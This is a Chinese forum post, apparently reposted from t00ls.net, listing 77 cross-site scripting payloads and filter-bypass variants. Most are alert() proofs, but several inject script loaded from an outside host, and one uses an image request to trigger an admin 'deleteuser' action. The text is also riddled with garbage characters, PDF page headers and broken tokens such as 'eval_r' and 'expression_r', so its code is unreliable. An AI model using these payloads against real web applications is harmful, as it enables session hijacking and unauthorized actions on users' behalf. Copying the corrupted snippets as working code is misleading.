貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。( Z8 q5 J) j& o$ V- ?
(1)普通的XSS JavaScript注入: n2 W c* F' L4 r" `) ~
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
8 K8 {% u- c `/ d(2)IMG标签XSS使用JavaScript命令
6 `/ A' w! B% }8 j x<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
% I1 _# \/ Q9 G( k0 v5 |5 }(3)IMG标签无分号无引号
! H7 W, }4 m% b" T; o<IMG SRC=javascript:alert(‘XSS’)>
" m* G$ \; Q* v0 u1 o$ U! @(4)IMG标签大小写不敏感. a Z" a* `$ @3 H H
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>6 A( b6 n& y2 Z: \" ]/ H5 v
(5)HTML编码(必须有分号)
% @( D& b; j' ?1 Q+ U, z* b0 c; }+ ^<IMG SRC=javascript:alert(“XSS”)>
7 o# ~0 s! }6 l3 Z5 f(6)修正缺陷IMG标签9 g0 H$ p7 F! u2 a; B1 i' T
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
% C6 x/ x N9 o! `- A y
$ b% ]7 O0 e1 [3 E' q# u% x" z* }, O x& K6 h+ e% U1 `) {
(7)formCharCode标签(计算器)
) [/ k c$ s/ ~% G; W$ T& D3 p<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
5 G* Z& Z$ _9 C, {6 d+ S8 l* v(8)UTF-8的Unicode编码(计算器)
; p" M9 z* ^6 M0 l4 N. }3 A<IMG SRC=jav..省略..S')> w$ w+ R: E/ a# x$ c4 D
(9)7位的UTF-8的Unicode编码是没有分号的(计算器) ^# }$ f4 U5 C; ]
<IMG SRC=jav..省略..S')>
5 ~, l0 G1 ]9 ^) z [& y(10)十六进制编码也是没有分号(计算器)
8 @6 m8 n# T; {8 f! _3 L3 p<IMG SRC=java..省略..XSS')>
* t( ]9 n0 `. E8 v" n( x8 l(11)嵌入式标签,将Javascript分开
. x* y4 ?3 G% q3 S8 U. W- R- A; Z9 l<IMG SRC=”jav ascript:alert(‘XSS’);”>- V, c4 _) p* z& ~1 \' s# h; _$ w
(12)嵌入式编码标签,将Javascript分开: j* V( c5 c' u! m$ D
<IMG SRC=”jav ascript:alert(‘XSS’);”>6 N8 g0 z8 y1 u
(13)嵌入式换行符
4 v; ~1 A H) q# n" |. U, b<IMG SRC=”jav ascript:alert(‘XSS’);”>
) ^8 u: p# |1 W. i8 u(14)嵌入式回车
, q i! T7 h& A& h<IMG SRC=”jav ascript:alert(‘XSS’);”>1 I5 Q& C0 E6 [ _
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
9 f7 ]5 B- j* P8 C2 r! p, P, O; x<IMG SRC=”javascript:alert(‘XSS‘)”>5 e; _, j+ I8 ^' m# Q) D m6 F4 }
(16)解决限制字符(要求同页面) \) P0 i, ~( [+ t+ _
<script>z=’document.’</script>
7 @. O' |( @- V' c( ]<script>z=z+’write(“‘</script>
* u" A, f+ P& }$ A+ R2 ?<script>z=z+’<script’</script>
. v2 G0 B1 ]0 p+ |4 g+ F8 F<script>z=z+’ src=ht’</script>9 `2 ^+ ~3 r: P0 O! t1 E: B& `2 G
<script>z=z+’tp://ww’</script>
, H/ W" @& |/ R. s& N/ ^$ `& K<script>z=z+’w.shell’</script>
2 m% }8 D. X' y. a. l9 \<script>z=z+’.net/1.’</script>5 S/ ^: f! `* f- n0 h5 N
<script>z=z+’js></sc’</script>4 E0 T( T: U# I' R
<script>z=z+’ript>”)’</script>' G' v: x6 I6 e4 r/ y7 O, x$ w$ Q5 C* w
<script>eval_r(z)</script>
3 R: g! ~+ [6 K, }6 b/ G2 ]0 y# u(17)空字符12-7-1 T00LS - Powered by Discuz! Board; D$ g |: u# P8 x
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
/ i* t5 ^9 v+ i! L/ J+ i! b" kperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
! b1 T+ F$ ^. ^2 ?; x* g(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用; a/ `/ N# S: U; s3 R% g
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
2 e- Y5 R7 u0 c: ^/ N(19)Spaces和meta前的IMG标签
& [& \% v( ^4 M4 a- h$ x0 p<IMG SRC=” javascript:alert(‘XSS’);”>$ R( G9 Z9 K$ _/ ]. {
(20)Non-alpha-non-digit XSS
3 x$ V# m% j& p" E1 R! o) f R8 o<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
h9 L2 I9 ~8 e, B8 q(21)Non-alpha-non-digit XSS to 2+ Q: Z5 j1 n1 g2 `% z- B
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>% p5 S* x" ?) \4 F5 F
(22)Non-alpha-non-digit XSS to 3
, Z H: S# R1 {) n; q8 z<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>" u3 ~- ?. m/ `7 X, d3 _
(23)双开括号9 P- s; G3 o5 a" _1 L+ ]
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
$ c {/ ~, b. u- P(24)无结束脚本标记(仅火狐等浏览器)
4 ]5 ~" g+ ? h<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>: m7 }6 ?( {" E2 y
(25)无结束脚本标记22 l ]5 W' o# x
<SCRIPT SRC=//3w.org/XSS/xss.js>8 n8 @+ C8 z+ g1 q
(26)半开的HTML/JavaScript XSS3 r7 m# s$ m8 I8 ~& k, p4 d e
<IMG SRC=”javascript:alert(‘XSS’)”9 p+ Z, B8 h9 d9 [, X' R8 F/ d
(27)双开角括号2 [( S+ S- P$ j
<iframe src=http://3w.org/XSS.html <' a: D; E6 ?" h6 G
(28)无单引号 双引号 分号, Q1 K d6 z# w0 y E" K# e
<SCRIPT>a=/XSS/ Q7 r- u' }6 O8 G" u0 F
alert(a.source)</SCRIPT>
" {$ d8 t$ @: W8 i' o0 ~(29)换码过滤的JavaScript
5 `, R3 _1 `& z8 X! B3 O+ V0 z\”;alert(‘XSS’);//
1 e$ O$ P. U# b(30)结束Title标签
7 V; Q7 O4 F: [% w7 f</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>. v% V. |- ^+ l9 {+ b
(31)Input Image! S5 o/ Z1 j: W$ W# v* z
<INPUT SRC=”javascript:alert(‘XSS’);”>+ K/ S8 ]5 U, u4 W* R
(32)BODY Image; `) I: d1 V) \7 L" p
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>8 W- y2 \8 D/ A1 u
(33)BODY标签
( K- T N( U: x2 j3 Z) ]7 l<BODY(‘XSS’)>
' }1 K# B. a, Y4 q- y+ p- _+ r(34)IMG Dynsrc
9 v/ _' ?$ U4 S7 N; n<IMG DYNSRC=”javascript:alert(‘XSS’)”>
8 {! T* `# }7 s. _& z(35)IMG Lowsrc. R h$ D8 `. Q* c& B
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
z6 y! I# L# _0 J( N(36)BGSOUND9 O8 K1 g5 ?. }0 L! r* N# O
<BGSOUND SRC=”javascript:alert(‘XSS’);”>" B$ [/ \, A/ d$ L3 _6 K# C3 S) g
(37)STYLE sheet
v; ?0 C; @# p) e- {4 o<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>) h4 m* O- e: n
(38)远程样式表
; Q" k D7 M/ W) l<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
* Y G4 p1 g: k(39)List-style-image(列表式)' @, a. X: w$ _
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS6 B& s1 S/ H% Z. i* O
(40)IMG VBscript6 S1 D" D* p+ A- i+ q8 F
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
4 A% t" ^ Q. F3 b& S(41)META链接url1 ^$ X1 S1 B/ v Q: [5 r
s- A* N. d% z G! m1 Z3 F n
5 Q. w5 n/ |: h- j<META HTTP-EQUIV=”refresh” CONTENT=”0;
0 u" B$ O3 O7 Z# V' Q1 vURL=http://;URL=javascript:alert(‘XSS’);”>
# n6 r1 c# X6 j2 r o(42)Iframe
) l. |; ~! V0 i$ o8 i- R2 n<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
- R O" O2 w' G9 i: n1 K5 _+ C(43)Frame" `6 Z+ A. h5 f, L' D
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
8 n! b6 L7 O1 ohttps://www.t00ls.net/viewthread ... table&tid=15267 3/6* D2 F' }* g$ ?" P9 I L' Y
(44)Table* R3 T6 o4 \6 v6 i
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>1 V2 D. [* x! Q# s6 L
(45)TD
/ ^. }8 i$ l4 {2 U( a<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
+ v: R Z+ r: v' {7 ]5 I(46)DIV background-image
2 h( T' }4 b o/ K! d' i+ V<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>! ]1 ]) ?. Y0 u6 l7 _
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-% ?1 m+ R4 r* A* R$ X7 U
8&13&12288&65279)$ x: e( f4 {: D
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>" W* m' X! v% Q) a# n
(48)DIV expression5 d ~: o+ `7 J0 d# R* }
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>. G- V8 p, H: K) p6 ^) ?+ U; M( R8 Q
(49)STYLE属性分拆表达& W) D; I1 ]8 o
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
+ O- r- X( L1 S5 Q. {# Y& t(50)匿名STYLE(组成:开角号和一个字母开头)
' M% @" y" x7 A; {+ w; r<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
1 T+ r# Y0 G, {( \- y(51)STYLE background-image/ T/ S, E, J: o( M& ]6 y: T9 U
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
8 g, Z. R+ v$ [CLASS=XSS></A>
M, f) K' G% C(52)IMG STYLE方式
& ^/ ^9 x1 k5 c! G1 m" I4 ?exppression(alert(“XSS”))’>
0 a ^3 G# `, s# U$ \# w(53)STYLE background
4 |' I) T* o4 r% p' Q<STYLE><STYLE0 E3 E, S# l3 J2 H* T6 }
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
& [, q* F$ v3 b& E6 z# O(54)BASE3 D! s& M1 J& z/ p: L
<BASE HREF=”javascript:alert(‘XSS’);//”>3 b& D2 I0 C$ l" U9 H3 k
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS" I8 ?& e$ o& ~; U3 F) o
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
" B: v7 z- a) G5 R! C- ~(56)在flash中使用ActionScrpt可以混进你XSS的代码+ r" I" }+ L4 \+ d
a=”get”;
( B- ~3 Z; }$ ]8 R; t, Ob=”URL(\”";" C, A7 J$ q; N9 {; u% q
c=”javascript:”;
. L5 Q+ a E9 j: I' R2 r0 K# Q' D! Od=”alert(‘XSS’);\”)”;0 T1 F8 P o6 D7 i6 G+ \+ x) J& m
eval_r(a+b+c+d);
4 f% H9 ]. B" p% d(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上! u) O- x | T# C6 F# |
<HTML xmlns:xss>& O, ?. L$ s2 |7 b
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
% i* v( m, w/ a<xss:xss>XSS</xss:xss>$ |% |& i. I% \7 X- q" S
</HTML>
0 [. Y3 C& [ J# I. [, _1 J- `(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
6 g5 m0 q6 }4 _" T3 m<SCRIPT SRC=””></SCRIPT>
. l8 D0 N) }& t/ j(59)IMG嵌入式命令,可执行任意命令+ R1 R# R; E0 N$ h7 [
<IMG SRC=”http://www.XXX.com/a.php?a=b”>5 c, r( Y1 w) M: r. ~+ ]
(60)IMG嵌入式命令(a.jpg在同服务器)$ N, c: e7 T3 U- x5 h4 C2 T4 q
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
9 z% S) R3 Q; q( T( M1 q: @(61)绕符号过滤4 m5 u/ I8 w" @ f+ h, `- r
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>: M0 k) c" F4 {8 X
(62)
, B A9 e7 {- x; ~, x. k<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
, o7 W* F- w$ q; S( n6 i2 p(63)1 k0 x5 p1 ^1 n. Z
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
% }* j, {$ G& {' M(64)
# l8 M" W- Y* ^9 Q<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>2 [. x9 {$ T' E" |4 X
(65)5 K. D9 u' Z0 \. P+ j) B( [
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>; P7 b3 }0 y5 W% [ U( Y1 ~ N
(66)12-7-1 T00LS - Powered by Discuz! Board
. J; i4 H/ r0 q% q) ehttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
$ j2 ?$ p; k u1 Y+ |<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>; o, H& o% t' d& r& o" C
(67)* p/ Z" w# S+ J( h( V0 }2 y
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
! A/ Y* V) i! m" o</SCRIPT>
( }. c$ |4 I) ^4 _2 k9 g2 ^(68)URL绕行& l$ Y6 d& e @, A6 }8 k, f
<A HREF=”http://127.0.0.1/”>XSS</A>/ T7 g5 C! V% W# D) ?$ X5 x6 g5 s+ E
(69)URL编码
# o# i9 c: ^: P<A HREF=”http://3w.org”>XSS</A>
9 Z6 |$ L* G1 u7 E, f6 `. `; v: B# e! F(70)IP十进制
3 T& S2 {5 t8 o& y* b; c<A HREF=”http://3232235521″>XSS</A>. g4 Q- R4 X) v, T6 Y8 Q8 u, {1 `: @
(71)IP十六进制
2 O( u4 b; W2 t; v- i# s \<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>: M4 c' D2 _) t: S- f/ R F! u
(72)IP八进制
N( f+ m' R9 ]3 e& P+ Q7 Q/ P<A HREF=”http://0300.0250.0000.0001″>XSS</A>
. m t% k9 l; l: a% I W8 ^% l' t(73)混合编码* b" e" J/ F$ Z& z
<A HREF=”h0 N6 _& j3 @. {0 z
tt p://6 6.000146.0×7.147/”">XSS</A>
( b3 n; O$ t' \3 p, t(74)节省[http:]% j, }* V0 T9 M% l
<A HREF=”//www.google.com/”>XSS</A>
4 z! I- S( j* V# \ J(75)节省[www]
+ o" z4 L& H$ J; P7 `- B! K2 v<A HREF=”http://google.com/”>XSS</A>( `0 U3 E9 o! c+ } {* m4 y* m
(76)绝对点绝对DNS% x4 Z1 d$ t4 z6 f
<A HREF=”http://www.google.com./”>XSS</A>/ s7 f6 f+ \) d
(77)javascript链接; O) ~) Z4 {/ p$ ?; m# d9 k
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>; D) A, l% T: p4 K" m4 K( {% i
6 X$ ]2 Z) a/ D2 e$ ~原文地址:http://fuzzexp.org/u/0day/?p=14
$ f8 \& s' S( a0 g) d. r) x# x1 w, P( w8 i P( D+ J$ m+ n1 f4 v
|
发表于 2013-4-19 19:22:37
收藏
分享
支持
反对